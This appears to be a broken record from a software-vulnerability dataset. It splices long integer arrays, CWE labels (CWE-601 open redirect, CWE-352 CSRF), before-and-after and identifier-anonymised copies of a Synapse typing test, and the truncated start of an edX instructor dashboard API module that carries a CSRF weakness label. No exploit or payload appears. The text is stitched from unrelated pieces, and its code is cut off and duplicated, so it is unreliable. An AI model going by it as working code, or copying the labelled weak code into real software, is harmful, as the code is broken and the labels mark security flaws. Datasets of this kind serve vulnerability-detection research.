237,
266,
267,
268,
285,
286,
287,
365,
366,
367,
396,
397,
398,
454,
455,
456,
514,
515,
516,
517,
564,
565,
566,
567,
591,
592,
593,
594,
640,
641,
642,
643,
644,
696,
697,
698,
699,
757,
758,
759,
760,
761,
818,
819,
820,
836,
837,
838,
851,
852,
853,
871,
872,
873,
874,
892,
893,
894,
895,
926,
927,
928,
1005,
1006,
1007,
1018,
1019,
1020,
1029,
1030,
1031,
1032,
1043,
1044,
1045,
1073,
1074,
1075,
1114,
1115,
1116,
1117,
1118,
1119,
1135,
1136,
1137,
1138,
1139,
1140,
1141,
1157,
1158,
1159,
1160,
1161,
1162,
1178,
1179,
1180,
1181,
1182,
1183,
1184,
1206,
1207,
1208,
1209,
1210,
1226,
1227,
1228,
1229,
1230,
1231,
1232,
1233,
1234,
1235,
1236,
1237,
1238,
1239,
1240,
1241,
1242,
1243,
1244,
1245,
1246,
1247,
1248,
1249,
1250,
1251,
1252,
1253,
1254,
1255,
1274,
1275,
1276,
1277,
1278,
1279,
1295,
1296,
1297,
1298,
1299,
1323,
1324,
1325,
1326,
1327,
1353,
1354,
1355,
1356,
1357,
1358,
1359,
1360,
1361,
1362,
1363,
1364,
1365,
1366,
1367,
1368,
1394,
1395,
1396,
1397,
1398,
1399,
1400,
1416,
1417,
1418,
1419,
1420,
1421,
1422,
1423,
1439,
1440,
1441,
1442,
1443,
1444,
1445,
1461,
1462,
1463,
1464,
1465,
1466,
1484,
1485,
1486,
1487,
1488,
1489,
1490,
1491,
1492,
1493,
1494,
1495,
1496,
1497,
1498,
1499,
1526,
1527,
1528,
1529,
1564,
1565,
1566,
1567,
1586,
1587,
1588,
1589,
1590,
1591,
1592,
1613,
1614,
1615,
1616,
1617,
1618,
1619,
1620,
1621,
1622,
1623,
1624,
1625,
1626,
1650,
1651,
1652,
1653,
1654,
1655,
1671,
1672,
1673,
1674,
1675,
1676,
1677,
1695,
1696,
1697,
1698,
1699,
1715,
1716,
1717,
1718,
1719,
1737,
1738,
1739,
1740,
1741,
1759,
1760,
1761,
1762,
1763,
1779,
1780,
1781,
1782,
1783,
1784,
1805,
1806,
1807,
1808,
1809,
1810,
1811,
1812,
1813,
1814,
1815,
1836,
1837,
1838,
1861,
1862,
1863,
1881,
1882,
1883,
1884,
1885,
1924,
1925,
1926,
1927,
1928,
1929,
1930
] | [
23,
24,
25,
26,
27,
30,
31,
32,
34,
35,
40,
41,
43,
44,
45,
46,
47,
56,
59,
62,
67,
70,
71,
72,
76,
77,
78,
79,
80,
81,
92,
93,
95,
96,
99,
100,
101,
102,
103,
104,
110,
112,
113,
119,
120,
123,
124,
126,
127,
131,
132,
134,
140,
141,
142,
143,
144,
145,
151,
152,
155,
156,
158,
159,
162,
163,
165,
166,
171,
173,
174,
176,
178,
179,
180,
186,
187,
190,
192,
193,
194,
201,
205,
207,
209,
210,
212,
213,
218,
220,
222,
229,
230,
231,
238,
242,
243,
245,
248,
250,
252,
253,
255,
257,
259,
261,
262,
280,
282,
288,
289,
291,
292,
298,
299,
303,
304,
306,
308,
310,
313,
314,
317,
318,
324,
325,
329,
330,
332,
334,
336,
339,
340,
343,
344,
347,
349,
352,
354,
357,
359,
360,
361,
368,
369,
371,
372,
377,
378,
380,
383,
385,
388,
390,
391,
392,
399,
400,
402,
406,
407,
409,
410,
412,
414,
415,
417,
418,
420,
421,
424,
425,
432,
433,
435,
437,
440,
448,
449,
450,
457,
458,
460,
465,
466,
468,
469,
471,
473,
474,
476,
477,
479,
480,
483,
484,
491,
492,
494,
496,
499,
508,
509,
510,
518,
521,
523,
524,
526,
527,
529,
530,
533,
534,
538,
539,
543,
545,
548,
558,
559,
560,
568,
569,
571,
573,
574,
576,
577,
579,
581,
583,
585,
586,
587,
595,
596,
599,
600,
602,
603,
607,
608,
610,
613,
615,
618,
620,
622,
623,
626,
628,
631,
633,
634,
635,
645,
647,
649,
650,
652,
654,
657,
658,
660,
661,
663,
664,
668,
669,
672,
674,
675,
677,
678,
684,
690,
691,
692,
700,
701,
703,
708,
709,
711,
712,
714,
716,
719,
720,
722,
723,
726,
727,
734,
735,
737,
741,
751,
752,
753,
762,
765,
767,
768,
770,
771,
773,
774,
776,
777,
781,
782,
785,
786,
790,
791,
795,
797,
800,
812,
813,
814,
821,
823,
825,
827,
830,
832,
844,
846,
847,
854,
856,
858,
860,
863,
865,
866,
867,
875,
877,
879,
881,
884,
886,
887,
888,
896,
900,
902,
905,
906,
909,
910,
913,
917,
920,
921,
929,
930,
932,
933,
935,
936,
938,
939,
945,
946,
948,
952,
956,
957,
960,
961,
964,
965,
967,
968,
972,
973,
976,
978,
979,
981,
982,
988,
993,
994,
995,
1000,
1001,
1002,
1008,
1010,
1013,
1014,
1015,
1021,
1024,
1025,
1026,
1033,
1036,
1037,
1038,
1039,
1040,
1046,
1047,
1051,
1052,
1056,
1057,
1063,
1064,
1067,
1068,
1069,
1070,
1071,
1076,
1079,
1081,
1082,
1085,
1088,
1089,
1101,
1103,
1105,
1106,
1107,
1108,
1109,
1110,
1116,
1120,
1122,
1124,
1127,
1129,
1130,
1131,
1137,
1142,
1144,
1146,
1149,
1151,
1152,
1153,
1159,
1163,
1165,
1167,
1170,
1172,
1173,
1174,
1180,
1182,
1185,
1186,
1191,
1193,
1195,
1198,
1200,
1201,
1202,
1211,
1213,
1215,
1218,
1220,
1221,
1222,
1228,
1230,
1234,
1236,
1240,
1242,
1246,
1249,
1251,
1256,
1257,
1259,
1261,
1263,
1266,
1268,
1269,
1270,
1276,
1280,
1282,
1284,
1287,
1289,
1290,
1291,
1300,
1301,
1303,
1304,
1306,
1307,
1310,
1311,
1315,
1317,
1318,
1319,
1328,
1329,
1331,
1332,
1334,
1335,
1338,
1339,
1343,
1345,
1346,
1347,
1348,
1349,
1355,
1365,
1369,
1379,
1381,
1383,
1386,
1388,
1389,
1390,
1396,
1401,
1403,
1405,
1408,
1410,
1411,
1412,
1418,
1424,
1426,
1428,
1431,
1433,
1434,
1435,
1441,
1446,
1448,
1450,
1453,
1455,
1456,
1457,
1467,
1469,
1471,
1474,
1476,
1477,
1478,
1479,
1480,
1486,
1497,
1500,
1511,
1513,
1515,
1518,
1520,
1521,
1522,
1530,
1532,
1536,
1538,
1542,
1545,
1548,
1550,
1553,
1554,
1559,
1560,
1568,
1570,
1572,
1575,
1577,
1578,
1579,
1580,
1581,
1588,
1590,
1593,
1595,
1600,
1603,
1605,
1606,
1607,
1608,
1609,
1615,
1624,
1627,
1635,
1637,
1639,
1642,
1644,
1645,
1646,
1652,
1656,
1658,
1660,
1663,
1665,
1666,
1667,
1672,
1674,
1678,
1680,
1682,
1685,
1687,
1688,
1689,
1690,
1691,
1697,
1700,
1702,
1704,
1707,
1709,
1710,
1711,
1717,
1720,
1722,
1724,
1727,
1729,
1730,
1731,
1732,
1733,
1739,
1742,
1744,
1746,
1749,
1751,
1752,
1753,
1754,
1755,
1761,
1764,
1766,
1768,
1771,
1773,
1774,
1775,
1781,
1785,
1787,
1789,
1792,
1794,
1795,
1796,
1797,
1798,
1801,
1802,
1803,
1810,
1813,
1816,
1817,
1819,
1820,
1823,
1824,
1826,
1827,
1830,
1831,
1833,
1834,
1839,
1840,
1845,
1846,
1851,
1852,
1857,
1858,
1859,
1864,
1873,
1878,
1879,
1886,
1887,
1889,
1891,
1897,
1902,
1903,
1904,
1908,
1909,
1910,
1921,
1922,
1931,
1933,
1934,
1936,
1939,
1944,
1945,
1946,
1947,
1948,
1951,
1955,
1960,
1962,
1963,
1964,
107,
108,
109,
148,
149,
150,
183,
184,
185,
198,
199,
200,
235,
236,
237,
266,
267,
268,
285,
286,
287,
365,
366,
367,
396,
397,
398,
454,
455,
456,
514,
515,
516,
517,
564,
565,
566,
567,
591,
592,
593,
594,
640,
641,
642,
643,
644,
696,
697,
698,
699,
757,
758,
759,
760,
761,
818,
819,
820,
836,
837,
838,
851,
852,
853,
871,
872,
873,
874,
892,
893,
894,
895,
926,
927,
928,
1005,
1006,
1007,
1018,
1019,
1020,
1029,
1030,
1031,
1032,
1043,
1044,
1045,
1073,
1074,
1075,
1114,
1115,
1116,
1117,
1118,
1119,
1135,
1136,
1137,
1138,
1139,
1140,
1141,
1157,
1158,
1159,
1160,
1161,
1162,
1178,
1179,
1180,
1181,
1182,
1183,
1184,
1206,
1207,
1208,
1209,
1210,
1226,
1227,
1228,
1229,
1230,
1231,
1232,
1233,
1234,
1235,
1236,
1237,
1238,
1239,
1240,
1241,
1242,
1243,
1244,
1245,
1246,
1247,
1248,
1249,
1250,
1251,
1252,
1253,
1254,
1255,
1274,
1275,
1276,
1277,
1278,
1279,
1295,
1296,
1297,
1298,
1299,
1323,
1324,
1325,
1326,
1327,
1353,
1354,
1355,
1356,
1357,
1358,
1359,
1360,
1361,
1362,
1363,
1364,
1365,
1366,
1367,
1368,
1394,
1395,
1396,
1397,
1398,
1399,
1400,
1416,
1417,
1418,
1419,
1420,
1421,
1422,
1423,
1439,
1440,
1441,
1442,
1443,
1444,
1445,
1461,
1462,
1463,
1464,
1465,
1466,
1484,
1485,
1486,
1487,
1488,
1489,
1490,
1491,
1492,
1493,
1494,
1495,
1496,
1497,
1498,
1499,
1526,
1527,
1528,
1529,
1564,
1565,
1566,
1567,
1586,
1587,
1588,
1589,
1590,
1591,
1592,
1613,
1614,
1615,
1616,
1617,
1618,
1619,
1620,
1621,
1622,
1623,
1624,
1625,
1626,
1650,
1651,
1652,
1653,
1654,
1655,
1671,
1672,
1673,
1674,
1675,
1676,
1677,
1695,
1696,
1697,
1698,
1699,
1715,
1716,
1717,
1718,
1719,
1737,
1738,
1739,
1740,
1741,
1759,
1760,
1761,
1762,
1763,
1779,
1780,
1781,
1782,
1783,
1784,
1805,
1806,
1807,
1808,
1809,
1810,
1811,
1812,
1813,
1814,
1815,
1836,
1837,
1838,
1861,
1862,
1863,
1881,
1882,
1883,
1884,
1885,
1924,
1925,
1926,
1927,
1928,
1929,
1930
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2018 New Vector
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests REST events for /rooms paths."""
from mock import Mock
from twisted.internet import defer
from synapse.rest.client.v1 import room
from synapse.types import UserID
from tests import unittest
PATH_PREFIX = "/_matrix/client/api/v1"
class RoomTypingTestCase(unittest.HomeserverTestCase):
""" Tests /rooms/$room_id/typing/$user_id REST API. """
user_id = "@sid:red"
user = UserID.from_string(user_id)
servlets = [room.register_servlets]
def make_homeserver(self, reactor, clock):
hs = self.setup_test_homeserver(
"red", http_client=None, federation_client=Mock(),
)
self.event_source = hs.get_event_sources().sources["typing"]
hs.get_federation_handler = Mock()
async def get_user_by_access_token(token=None, allow_guest=False):
return {
"user": UserID.from_string(self.auth_user_id),
"token_id": 1,
"is_guest": False,
}
hs.get_auth().get_user_by_access_token = get_user_by_access_token
async def _insert_client_ip(*args, **kwargs):
return None
hs.get_datastore().insert_client_ip = _insert_client_ip
def get_room_members(room_id):
if room_id == self.room_id:
return defer.succeed([self.user])
else:
return defer.succeed([])
@defer.inlineCallbacks
def fetch_room_distributions_into(
room_id, localusers=None, remotedomains=None, ignore_user=None
):
members = yield get_room_members(room_id)
for member in members:
if ignore_user is not None and member == ignore_user:
continue
if hs.is_mine(member):
if localusers is not None:
localusers.add(member)
else:
if remotedomains is not None:
remotedomains.add(member.domain)
hs.get_room_member_handler().fetch_room_distributions_into = (
fetch_room_distributions_into
)
return hs
def prepare(self, reactor, clock, hs):
self.room_id = self.helper.create_room_as(self.user_id)
# Need another user to make notifications actually work
self.helper.join(self.room_id, user="@jim:red")
def test_set_typing(self):
request, channel = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, channel.code)
self.assertEquals(self.event_source.get_current_key(), 1)
events = self.get_success(
self.event_source.get_new_events(from_key=0, room_ids=[self.room_id])
)
self.assertEquals(
events[0],
[
{
"type": "m.typing",
"room_id": self.room_id,
"content": {"user_ids": [self.user_id]},
}
],
)
def test_set_not_typing(self):
request, channel = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": false}',
)
self.assertEquals(200, channel.code)
def test_typing_timeout(self):
request, channel = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, channel.code)
self.assertEquals(self.event_source.get_current_key(), 1)
self.reactor.advance(36)
self.assertEquals(self.event_source.get_current_key(), 2)
request, channel = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, channel.code)
self.assertEquals(self.event_source.get_current_key(), 3)
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2018 New Vector
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests REST events for /rooms paths."""
from mock import Mock
from twisted.internet import defer
from synapse.rest.client.v1 import room
from synapse.types import UserID
from tests import unittest
PATH_PREFIX = "/_matrix/client/api/v1"
class RoomTypingTestCase(unittest.HomeserverTestCase):
""" Tests /rooms/$room_id/typing/$user_id REST API. """
user_id = "@sid:red"
user = UserID.from_string(user_id)
servlets = [room.register_servlets]
def make_homeserver(self, reactor, clock):
hs = self.setup_test_homeserver(
"red", federation_http_client=None, federation_client=Mock(),
)
self.event_source = hs.get_event_sources().sources["typing"]
hs.get_federation_handler = Mock()
async def get_user_by_access_token(token=None, allow_guest=False):
return {
"user": UserID.from_string(self.auth_user_id),
"token_id": 1,
"is_guest": False,
}
hs.get_auth().get_user_by_access_token = get_user_by_access_token
async def _insert_client_ip(*args, **kwargs):
return None
hs.get_datastore().insert_client_ip = _insert_client_ip
def get_room_members(room_id):
if room_id == self.room_id:
return defer.succeed([self.user])
else:
return defer.succeed([])
@defer.inlineCallbacks
def fetch_room_distributions_into(
room_id, localusers=None, remotedomains=None, ignore_user=None
):
members = yield get_room_members(room_id)
for member in members:
if ignore_user is not None and member == ignore_user:
continue
if hs.is_mine(member):
if localusers is not None:
localusers.add(member)
else:
if remotedomains is not None:
remotedomains.add(member.domain)
hs.get_room_member_handler().fetch_room_distributions_into = (
fetch_room_distributions_into
)
return hs
def prepare(self, reactor, clock, hs):
self.room_id = self.helper.create_room_as(self.user_id)
# Need another user to make notifications actually work
self.helper.join(self.room_id, user="@jim:red")
def test_set_typing(self):
request, channel = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, channel.code)
self.assertEquals(self.event_source.get_current_key(), 1)
events = self.get_success(
self.event_source.get_new_events(from_key=0, room_ids=[self.room_id])
)
self.assertEquals(
events[0],
[
{
"type": "m.typing",
"room_id": self.room_id,
"content": {"user_ids": [self.user_id]},
}
],
)
def test_set_not_typing(self):
request, channel = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": false}',
)
self.assertEquals(200, channel.code)
def test_typing_timeout(self):
request, channel = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, channel.code)
self.assertEquals(self.event_source.get_current_key(), 1)
self.reactor.advance(36)
self.assertEquals(self.event_source.get_current_key(), 2)
request, channel = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, channel.code)
self.assertEquals(self.event_source.get_current_key(), 3)
| open_redirect | {
"code": [
" \"red\", http_client=None, federation_client=Mock(),"
],
"line_no": [
42
]
} | {
"code": [
" \"red\", federation_http_client=None, federation_client=Mock(),"
],
"line_no": [
42
]
} |
from mock import Mock
from twisted.internet import defer
from synapse.rest.client.v1 import room
from synapse.types import UserID
from tests import unittest
VAR_0 = "/_matrix/client/api/v1"
class CLASS_0(unittest.HomeserverTestCase):
VAR_1 = "@sid:red"
VAR_2 = UserID.from_string(VAR_1)
VAR_3 = [room.register_servlets]
def FUNC_0(self, VAR_4, VAR_5):
VAR_6 = self.setup_test_homeserver(
"red", http_client=None, federation_client=Mock(),
)
self.event_source = VAR_6.get_event_sources().sources["typing"]
VAR_6.get_federation_handler = Mock()
async def FUNC_5(VAR_7=None, VAR_8=False):
return {
"user": UserID.from_string(self.auth_user_id),
"token_id": 1,
"is_guest": False,
}
VAR_6.get_auth().get_user_by_access_token = FUNC_5
async def FUNC_6(*VAR_9, **VAR_10):
return None
VAR_6.get_datastore().insert_client_ip = FUNC_6
def FUNC_7(VAR_11):
if VAR_11 == self.room_id:
return defer.succeed([self.user])
else:
return defer.succeed([])
@defer.inlineCallbacks
def FUNC_8(
VAR_11, VAR_12=None, VAR_13=None, VAR_14=None
):
VAR_18 = yield FUNC_7(VAR_11)
for member in VAR_18:
if VAR_14 is not None and member == VAR_14:
continue
if VAR_6.is_mine(member):
if VAR_12 is not None:
VAR_12.add(member)
else:
if VAR_13 is not None:
VAR_13.add(member.domain)
VAR_6.get_room_member_handler().fetch_room_distributions_into = (
FUNC_8
)
return VAR_6
def FUNC_1(self, VAR_4, VAR_5, VAR_6):
self.room_id = self.helper.create_room_as(self.user_id)
self.helper.join(self.room_id, VAR_2="@jim:red")
def FUNC_2(self):
VAR_15, VAR_16 = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, VAR_16.code)
self.assertEquals(self.event_source.get_current_key(), 1)
VAR_17 = self.get_success(
self.event_source.get_new_events(from_key=0, room_ids=[self.room_id])
)
self.assertEquals(
VAR_17[0],
[
{
"type": "m.typing",
"room_id": self.room_id,
"content": {"user_ids": [self.user_id]},
}
],
)
def FUNC_3(self):
VAR_15, VAR_16 = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": false}',
)
self.assertEquals(200, VAR_16.code)
def FUNC_4(self):
VAR_15, VAR_16 = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, VAR_16.code)
self.assertEquals(self.event_source.get_current_key(), 1)
self.reactor.advance(36)
self.assertEquals(self.event_source.get_current_key(), 2)
VAR_15, VAR_16 = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, VAR_16.code)
self.assertEquals(self.event_source.get_current_key(), 3)
|
from mock import Mock
from twisted.internet import defer
from synapse.rest.client.v1 import room
from synapse.types import UserID
from tests import unittest
VAR_0 = "/_matrix/client/api/v1"
class CLASS_0(unittest.HomeserverTestCase):
VAR_1 = "@sid:red"
VAR_2 = UserID.from_string(VAR_1)
VAR_3 = [room.register_servlets]
def FUNC_0(self, VAR_4, VAR_5):
VAR_6 = self.setup_test_homeserver(
"red", federation_http_client=None, federation_client=Mock(),
)
self.event_source = VAR_6.get_event_sources().sources["typing"]
VAR_6.get_federation_handler = Mock()
async def FUNC_5(VAR_7=None, VAR_8=False):
return {
"user": UserID.from_string(self.auth_user_id),
"token_id": 1,
"is_guest": False,
}
VAR_6.get_auth().get_user_by_access_token = FUNC_5
async def FUNC_6(*VAR_9, **VAR_10):
return None
VAR_6.get_datastore().insert_client_ip = FUNC_6
def FUNC_7(VAR_11):
if VAR_11 == self.room_id:
return defer.succeed([self.user])
else:
return defer.succeed([])
@defer.inlineCallbacks
def FUNC_8(
VAR_11, VAR_12=None, VAR_13=None, VAR_14=None
):
VAR_18 = yield FUNC_7(VAR_11)
for member in VAR_18:
if VAR_14 is not None and member == VAR_14:
continue
if VAR_6.is_mine(member):
if VAR_12 is not None:
VAR_12.add(member)
else:
if VAR_13 is not None:
VAR_13.add(member.domain)
VAR_6.get_room_member_handler().fetch_room_distributions_into = (
FUNC_8
)
return VAR_6
def FUNC_1(self, VAR_4, VAR_5, VAR_6):
self.room_id = self.helper.create_room_as(self.user_id)
self.helper.join(self.room_id, VAR_2="@jim:red")
def FUNC_2(self):
VAR_15, VAR_16 = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, VAR_16.code)
self.assertEquals(self.event_source.get_current_key(), 1)
VAR_17 = self.get_success(
self.event_source.get_new_events(from_key=0, room_ids=[self.room_id])
)
self.assertEquals(
VAR_17[0],
[
{
"type": "m.typing",
"room_id": self.room_id,
"content": {"user_ids": [self.user_id]},
}
],
)
def FUNC_3(self):
VAR_15, VAR_16 = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": false}',
)
self.assertEquals(200, VAR_16.code)
def FUNC_4(self):
VAR_15, VAR_16 = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, VAR_16.code)
self.assertEquals(self.event_source.get_current_key(), 1)
self.reactor.advance(36)
self.assertEquals(self.event_source.get_current_key(), 2)
VAR_15, VAR_16 = self.make_request(
"PUT",
"/rooms/%s/typing/%s" % (self.room_id, self.user_id),
b'{"typing": true, "timeout": 30000}',
)
self.assertEquals(200, VAR_16.code)
self.assertEquals(self.event_source.get_current_key(), 3)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
18,
20,
22,
25,
27,
29,
30,
33,
35,
38,
40,
44,
46,
48,
55,
57,
60,
62,
68,
77,
84,
88,
90,
93,
95,
103,
118,
126,
134,
136,
138,
140,
147,
149,
17,
32
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
18,
20,
22,
25,
27,
29,
30,
33,
35,
38,
40,
44,
46,
48,
55,
57,
60,
62,
68,
77,
84,
88,
90,
93,
95,
103,
118,
126,
134,
136,
138,
140,
147,
149,
17,
32
] |
3CWE-352
| """
Instructor Dashboard API views
JSON views which the instructor dashboard requests.
Many of these GETs may become PUTs in the future.
"""
import StringIO
import json
import logging
import re
import time
from django.conf import settings
from django.views.decorators.csrf import ensure_csrf_cookie, csrf_exempt
from django.views.decorators.http import require_POST, require_http_methods
from django.views.decorators.cache import cache_control
from django.core.exceptions import ValidationError, PermissionDenied
from django.core.mail.message import EmailMessage
from django.core.exceptions import ObjectDoesNotExist
from django.db import IntegrityError, transaction
from django.core.urlresolvers import reverse
from django.core.validators import validate_email
from django.utils.translation import ugettext as _
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseNotFound
from django.utils.html import strip_tags
from django.shortcuts import redirect
import string
import random
import unicodecsv
import decimal
from student import auth
from student.roles import GlobalStaff, CourseSalesAdminRole, CourseFinanceAdminRole
from util.file import (
store_uploaded_file, course_and_time_based_filename_generator,
FileValidationException, UniversalNewlineIterator
)
from util.json_request import JsonResponse, JsonResponseBadRequest
from instructor.views.instructor_task_helpers import extract_email_features, extract_task_features
from microsite_configuration import microsite
from courseware.access import has_access
from courseware.courses import get_course_with_access, get_course_by_id
from django.contrib.auth.models import User
from django_comment_client.utils import has_forum_access
from django_comment_common.models import (
Role,
FORUM_ROLE_ADMINISTRATOR,
FORUM_ROLE_MODERATOR,
FORUM_ROLE_COMMUNITY_TA,
)
from edxmako.shortcuts import render_to_string
from courseware.models import StudentModule
from shoppingcart.models import (
Coupon,
CourseRegistrationCode,
RegistrationCodeRedemption,
Invoice,
CourseMode,
CourseRegistrationCodeInvoiceItem,
)
from student.models import (
CourseEnrollment, unique_id_for_user, anonymous_id_for_user,
UserProfile, Registration, EntranceExamConfiguration,
ManualEnrollmentAudit, UNENROLLED_TO_ALLOWEDTOENROLL, ALLOWEDTOENROLL_TO_ENROLLED,
ENROLLED_TO_ENROLLED, ENROLLED_TO_UNENROLLED, UNENROLLED_TO_ENROLLED,
UNENROLLED_TO_UNENROLLED, ALLOWEDTOENROLL_TO_UNENROLLED, DEFAULT_TRANSITION_STATE
)
import instructor_task.api
from instructor_task.api_helper import AlreadyRunningError
from instructor_task.models import ReportStore
import instructor.enrollment as enrollment
from instructor.enrollment import (
get_user_email_language,
enroll_email,
send_mail_to_student,
get_email_params,
send_beta_role_email,
unenroll_email,
)
from instructor.access import list_with_level, allow_access, revoke_access, ROLES, update_forum_role
import instructor_analytics.basic
import instructor_analytics.distributions
import instructor_analytics.csvs
import csv
from openedx.core.djangoapps.user_api.preferences.api import get_user_preference, set_user_preference
from openedx.core.djangolib.markup import HTML, Text
from instructor.views import INVOICE_KEY
from submissions import api as sub_api # installed from the edx-submissions repository
from certificates import api as certs_api
from certificates.models import CertificateWhitelist, GeneratedCertificate, CertificateStatuses, CertificateInvalidation
from bulk_email.models import CourseEmail, BulkEmailFlag
from student.models import get_user_by_username_or_email
from .tools import (
dump_student_extensions,
dump_module_extensions,
find_unit,
get_student_from_identifier,
require_student_from_identifier,
handle_dashboard_error,
parse_datetime,
set_due_date_extension,
strip_if_string,
)
from opaque_keys.edx.keys import CourseKey, UsageKey
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from opaque_keys import InvalidKeyError
from openedx.core.djangoapps.course_groups.cohorts import is_course_cohorted
from openedx.core.djangoapps.theming import helpers as theming_helpers
log = logging.getLogger(__name__)
def common_exceptions_400(func):
"""
Catches common exceptions and renders matching 400 errors.
(decorator without arguments)
"""
def wrapped(request, *args, **kwargs): # pylint: disable=missing-docstring
use_json = (request.is_ajax() or
request.META.get("HTTP_ACCEPT", "").startswith("application/json"))
try:
return func(request, *args, **kwargs)
except User.DoesNotExist:
message = _("User does not exist.")
if use_json:
return JsonResponse({"error": message}, 400)
else:
return HttpResponseBadRequest(message)
except AlreadyRunningError:
message = _("Task is already running.")
if use_json:
return JsonResponse({"error": message}, 400)
else:
return HttpResponseBadRequest(message)
return wrapped
def require_query_params(*args, **kwargs):
"""
Checks for required paremters or renders a 400 error.
(decorator with arguments)
`args` is a *list of required GET parameter names.
`kwargs` is a **dict of required GET parameter names
to string explanations of the parameter
"""
required_params = []
required_params += [(arg, None) for arg in args]
required_params += [(key, kwargs[key]) for key in kwargs]
# required_params = e.g. [('action', 'enroll or unenroll'), ['emails', None]]
def decorator(func): # pylint: disable=missing-docstring
def wrapped(*args, **kwargs): # pylint: disable=missing-docstring
request = args[0]
error_response_data = {
'error': 'Missing required query parameter(s)',
'parameters': [],
'info': {},
}
for (param, extra) in required_params:
default = object()
if request.GET.get(param, default) == default:
error_response_data['parameters'].append(param)
error_response_data['info'][param] = extra
if len(error_response_data['parameters']) > 0:
return JsonResponse(error_response_data, status=400)
else:
return func(*args, **kwargs)
return wrapped
return decorator
def require_post_params(*args, **kwargs):
"""
Checks for required parameters or renders a 400 error.
(decorator with arguments)
Functions like 'require_query_params', but checks for
POST parameters rather than GET parameters.
"""
required_params = []
required_params += [(arg, None) for arg in args]
required_params += [(key, kwargs[key]) for key in kwargs]
# required_params = e.g. [('action', 'enroll or unenroll'), ['emails', None]]
def decorator(func): # pylint: disable=missing-docstring
def wrapped(*args, **kwargs): # pylint: disable=missing-docstring
request = args[0]
error_response_data = {
'error': 'Missing required query parameter(s)',
'parameters': [],
'info': {},
}
for (param, extra) in required_params:
default = object()
if request.POST.get(param, default) == default:
error_response_data['parameters'].append(param)
error_response_data['info'][param] = extra
if len(error_response_data['parameters']) > 0:
return JsonResponse(error_response_data, status=400)
else:
return func(*args, **kwargs)
return wrapped
return decorator
def require_level(level):
"""
Decorator with argument that requires an access level of the requesting
user. If the requirement is not satisfied, returns an
HttpResponseForbidden (403).
Assumes that request is in args[0].
Assumes that course_id is in kwargs['course_id'].
`level` is in ['instructor', 'staff']
if `level` is 'staff', instructors will also be allowed, even
if they are not in the staff group.
"""
if level not in ['instructor', 'staff']:
raise ValueError("unrecognized level '{}'".format(level))
def decorator(func): # pylint: disable=missing-docstring
def wrapped(*args, **kwargs): # pylint: disable=missing-docstring
request = args[0]
course = get_course_by_id(CourseKey.from_string(kwargs['course_id']))
if has_access(request.user, level, course):
return func(*args, **kwargs)
else:
return HttpResponseForbidden()
return wrapped
return decorator
def require_global_staff(func):
"""View decorator that requires that the user have global staff permissions. """
def wrapped(request, *args, **kwargs): # pylint: disable=missing-docstring
if GlobalStaff().has_user(request.user):
return func(request, *args, **kwargs)
else:
return HttpResponseForbidden(
u"Must be {platform_name} staff to perform this action.".format(
platform_name=settings.PLATFORM_NAME
)
)
return wrapped
def require_sales_admin(func):
"""
Decorator for checking sales administrator access before executing an HTTP endpoint. This decorator
is designed to be used for a request based action on a course. It assumes that there will be a
request object as well as a course_id attribute to leverage to check course level privileges.
If the user does not have privileges for this operation, this will return HttpResponseForbidden (403).
"""
def wrapped(request, course_id): # pylint: disable=missing-docstring
try:
course_key = CourseKey.from_string(course_id)
except InvalidKeyError:
log.error(u"Unable to find course with course key %s", course_id)
